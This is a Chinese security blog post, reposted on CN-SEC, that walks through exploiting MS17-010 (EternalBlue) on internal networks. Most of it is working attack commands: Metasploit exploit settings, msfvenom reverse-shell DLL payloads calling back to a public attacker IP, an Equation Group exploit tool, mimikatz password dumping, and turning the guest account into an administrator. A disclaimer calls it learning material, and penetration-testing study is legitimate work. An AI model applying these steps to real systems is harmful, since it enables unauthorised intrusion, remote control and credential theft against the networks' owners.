【技巧分享】内网渗透之ms17-010

admin 2022年4月10日15:31:50安全文章评论36 views2510字阅读8分22秒阅读模式

山东新潮信息

专业|专注|卓越|安全


【技巧分享】内网渗透之ms17-010
【技巧分享】内网渗透之ms17-010
【技巧分享】内网渗透之ms17-010
【技巧分享】内网渗透之ms17-010
【技巧分享】内网渗透之ms17-010
【技巧分享】内网渗透之ms17-010
【技巧分享】内网渗透之ms17-010


声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!



前言

在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010。

ms17_010_eternalblue模块

在msf成功接收session之后,添加路由


run autoroute -p 

【技巧分享】内网渗透之ms17-010


然后使用ms17-010相关的模块进行探测是否存在该漏洞。


use  auxiliary/scanner/smb/smb_ms17_010

set  rhosts 192.168.100.40-50 

set  threads 3


【技巧分享】内网渗透之ms17-010


尝试利用


use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost 192.168.100.46

set lhost 144.30.xxx.xxx


LHOST配置为公网IP


【技巧分享】内网渗透之ms17-010


【技巧分享】内网渗透之ms17-010


可以看到success。漏洞是可以利用的,但始终没有session。不知道什么原因。

参考资料:利用公网Msf+MS17010跨网段攻击内网

笔者在本地搭建环境,也是同样的结果。尝试更改payload为

windows/x64/meterpreter/bind_tcp 

bind_tcp攻击者去连接,容易被防火墙和杀毒发现

可以成功生成session,但并不稳定,且在run的过程中非常容易导致本来的session died

【技巧分享】内网渗透之ms17-010

测试环境

【技巧分享】内网渗透之ms17-010

实战环境

方程式漏洞利用工具

在实际使用msf的ms17_010_eternalblue模块时,笔者观察到有几个弊端。

1.session 很容易died

2.ms17_010_eternalblue模块利用起来非常耗时

3.无法利用成功

有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。

所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。

参考资料:萌新初试MS17-010方程式漏洞

工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候,调用x64.dll动态链接库,反弹到公网IP。原理和fb.py一样。

实战利用

笔者通过ew代理进内网后,在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合,威力巨大。成功利用ms17-010

【技巧分享】内网渗透之ms17-010



【技巧分享】内网渗透之ms17-010

windows server 2008


对于windows server 2008 ,msfvenom生成x64.dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=144.30.xxx.xxx LPORT=12345 -f dll > x64.dll


msf配置

use exploit/multi/handler 

set payload windows/x64/meterpreter/reverse_tcp

set lport 12345

set lhost 144.30.xxx.xxx


将该x64.dll替换到方程式利用工具下面。

只需要更换目标的IP,就可以获取session。

【技巧分享】内网渗透之ms17-010

windows server 2003


对于windows server 2003 ,msfvenom生成x86.dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=144.30.xxx.xxx LPORT=12345 -f dll > x86.dll


msf配置


use exploit/multi/handler 

set payload windows/meterpreter/reverse_tcp

set lport 12345

set lhost 144.30.xxx.xxx


【技巧分享】内网渗透之ms17-010


进一步利用的一些命令


getuid

run   post/windows/gather/checkvm 

run   post/windows/manage/migrate

load  mimikatz

mimikatz_command -f sekurlsa::searchPasswords



【技巧分享】内网渗透之ms17-010

实际测试发现这种session非常稳定。不会轻易go die

扩展

实际测试server 2003的ms17-010时,有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏。

所以笔者选择一种稳定可靠一些的办法。

先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]

参考资料  Metasploit 「永恒之蓝」两种模块的利弊


use auxiliary/admin/smb/ms17_010_command


【技巧分享】内网渗透之ms17-010


system的权限可以直接激活guest用户添加管理员组。


use exploit/windows/smb/ms17_010_psexec 

set rhosts  192.168.100.2

set SMBUser  guest

set SMBPass  123456

run

注意:使用ms17_010_psexec需要指定管理员的用户名、密码,否则没有session


【技巧分享】内网渗透之ms17-010

同样的操作,载入mimikatz,读取管理员密码。

【技巧分享】内网渗透之ms17-010



E




N




D






【技巧分享】内网渗透之ms17-010


gūan




zhù







men





Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或长按二维码关注公众号:

【技巧分享】内网渗透之ms17-010





原文始发于微信公众号(白帽子):【技巧分享】内网渗透之ms17-010

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月10日15:31:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【技巧分享】内网渗透之ms17-010 http://cn-sec.com/archives/894274.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: